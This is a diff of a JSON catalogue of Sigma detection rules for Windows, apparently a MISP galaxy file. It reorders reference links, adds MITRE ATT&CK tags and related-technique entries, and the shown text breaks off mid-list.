@@ -3822,8 +3822,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://github.com/boku7/injectAmsiBypass", "https://github.com/boku7/spawn", + "https://github.com/boku7/injectAmsiBypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml" ], "tags": [ @@ -3865,9 +3865,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ + "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", "https://twitter.com/SBousseaden/status/1541920424635912196", - "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_seclogon.yml" ], "tags": [ @@ -4097,10 +4097,10 @@ "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/253", - "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", "https://twitter.com/d4rksystem/status/1357010969264873472", - "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", + "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike.yml" ], "tags": [ 
@@ -4336,18 +4336,18 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ + "https://securelist.com/faq-the-projectsauron-apt/75533/", + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://www.us-cert.gov/ncas/alerts/TA17-117A", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", + "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", - "https://thedfirreport.com/2020/06/21/snatch-ransomware/", - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", - "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", - "https://securelist.com/faq-the-projectsauron-apt/75533/", - "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + 
"https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml" ], "tags": [ @@ -4381,8 +4381,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml" ], "tags": [ @@ -4595,8 +4595,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", - "https://o365blog.com/post/adfs/", "https://github.com/Azure/SimuLand", + "https://o365blog.com/post/adfs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml" ], "tags": [ @@ -4662,8 +4662,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_re.yml" ], "tags": [ 
@@ -4796,8 +4796,20 @@ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_change_rule.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5570c4d9-8fdd-4622-965b-403a5a101aa0", "value": "Firewall Rule Modified In The Windows Firewall Exception List" }, @@ -4818,8 +4830,20 @@ "https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/#", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", "value": "New Firewall Exception Rule Added For A Suspicious Folder" }, @@ -4837,8 +4861,20 @@ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7ec15688-fd24-4177-ba43-1a950537ee39", "value": "The Windows Defender Firewall Service Failed To Load Group Policy" }, 
@@ -4856,8 +4892,20 @@ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", "value": "A Rule Has Been Deleted From The Windows Firewall Exception List" }, @@ -4875,8 +4923,20 @@ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_reset_config.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "04b60639-39c0-412a-9fbe-e82499c881a3", "value": "Windows Defender Firewall Has Been Reset To Its Default Configuration" }, 
@@ -4894,8 +4954,20 @@ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_all_rules.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "79609c82-a488-426e-abcf-9f341a39365d", "value": "All Rules Have Been Deleted From The Windows Firewall Configuration" }, @@ -4913,8 +4985,20 @@ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", "value": "Windows Firewall Settings Have Been Changed" }, 
@@ -4932,8 +5016,20 @@ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cde0a575-7d3d-4a49-9817-b8004a7bf105", "value": "New Firewall Rule Added In Windows Firewall Exception List" }, @@ -5095,8 +5191,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://twitter.com/deviouspolack/status/832535435960209408", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml" ], "tags": [ 
@@ -5130,10 +5226,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", "https://twitter.com/MsftSecIntel/status/1257324139515269121", "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", - "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml" ], "tags": [ @@ -5166,8 +5262,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml" ], "tags": [ 
@@ -5285,8 +5381,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" ], "tags": [ @@ -5352,12 +5448,24 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml" ], - "tags": "No established tags" + "tags": [ + "attack.initial_access", + "attack.t1200" + ] }, + "related": [ + { + "dest-uuid": "d40239b3-05ff-46d8-9bdd-b46d13463ef9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c9eb55c3-b468-40ab-9089-db2862e42137", "value": "Device Installation Blocked" }, 
@@ -5407,13 +5515,43 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672", - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.lateral_movement", + "attack.credential_access", + "attack.t1558", + "attack.t1649", + "attack.t1550" + ] }, + "related": [ + { + "dest-uuid": "3fc01293-ef5e-41c6-86ce-61f10706b64a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7de1f7ac-5d0c-4c9c-8873-627202205331", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "94309181-d345-4cbf-b5fe-061769bdf9cb", "value": "User with Privileges Logon" }, 
@@ -5430,8 +5568,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://o365blog.com/post/hybridhealthagent/", "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml", + "https://o365blog.com/post/hybridhealthagent/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml" ], "tags": [ @@ -5464,8 +5602,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/mattifestation/status/899646620148539397", "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://twitter.com/mattifestation/status/899646620148539397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml" ], "tags": [ @@ -5502,8 +5640,20 @@ "https://twitter.com/sbousseaden/status/1523383197513379841", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] }, + "related": [ + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "00ba9da1-b510-4f6b-b258-8d338836180f", "value": "Password Protected ZIP File Opened" }, 
@@ -5588,10 +5738,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/sensepost/ruler/issues/47", + "https://github.com/sensepost/ruler", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776", "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", - "https://github.com/sensepost/ruler", - "https://github.com/sensepost/ruler/issues/47", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" ], @@ -5682,9 +5832,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", - "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", "https://awakesecurity.com/blog/threat-hunting-for-paexec/", + "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", + "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml" ], "tags": [ 
@@ -5877,9 +6027,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" ], "tags": "No established tags" @@ -5932,8 +6082,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", + "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" ], @@ -6180,8 +6330,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/library/windows/active_directory_replication.html", "https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html", + "https://threathunterplaybook.com/library/windows/active_directory_replication.html", "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml" ], 
@@ -6539,8 +6689,8 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", - "https://twitter.com/gentilkiwi/status/1003236624925413376", "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", + "https://twitter.com/gentilkiwi/status/1003236624925413376", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" ], "tags": [ @@ -6684,9 +6834,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "Live environment caused by malware", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616", "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", - "Live environment caused by malware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" ], "tags": [ @@ -7230,12 +7380,24 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml" ], - "tags": "No established tags" + "tags": [ + "attack.credential_access", + "attack.t1558" + ] }, + "related": [ + { + "dest-uuid": "3fc01293-ef5e-41c6-86ce-61f10706b64a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5a44727c-3b85-4713-8c44-4401d5499629", "value": "Replay Attack Detected" }, 
@@ -7252,10 +7414,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SecurityJosh/status/1283027365770276866", - "https://twitter.com/Flangvik/status/1283054508084473861", - "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", + "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", + "https://twitter.com/Flangvik/status/1283054508084473861", + "https://twitter.com/SecurityJosh/status/1283027365770276866", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" ], "tags": [ @@ -7568,9 +7730,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", "https://github.com/topotam/PetitPotam", "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", - "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" ], "tags": [ @@ -7603,8 +7765,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673", + "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml" ], "tags": [ 
@@ -7679,8 +7841,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" ], "tags": [ @@ -7722,8 +7884,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://adsecurity.org/?p=3458", "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity", + "https://adsecurity.org/?p=3458", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" ], "tags": [ @@ -7863,13 +8025,25 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1207" + ] }, + "related": [ + { + "dest-uuid": "564998d8-ab3e-4123-93fb-eccaa6b9714a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", "value": "Add or Remove Computer from DC" }, 
@@ -8167,8 +8341,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/library/windows/active_directory_replication.html", "https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html", + "https://threathunterplaybook.com/library/windows/active_directory_replication.html", "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml" ], @@ -8205,8 +8379,29 @@ "https://twitter.com/sbousseaden/status/1523383197513379841", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.initial_access", + "attack.t1027", + "attack.t1566.001" + ] }, + "related": [ + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "571498c8-908e-40b4-910b-d2369159a3da", "value": "Password Protected ZIP File Opened (Email Attachment)" }, 
@@ -8223,10 +8418,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_workstation_was_locked.yml" ], "tags": "No established tags" 
@@ -8247,16 +8442,16 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://bunnyinside.com/?term=f71e8cb9c76a", "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", "https://twitter.com/_xpn_/status/1268712093928378368", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + 
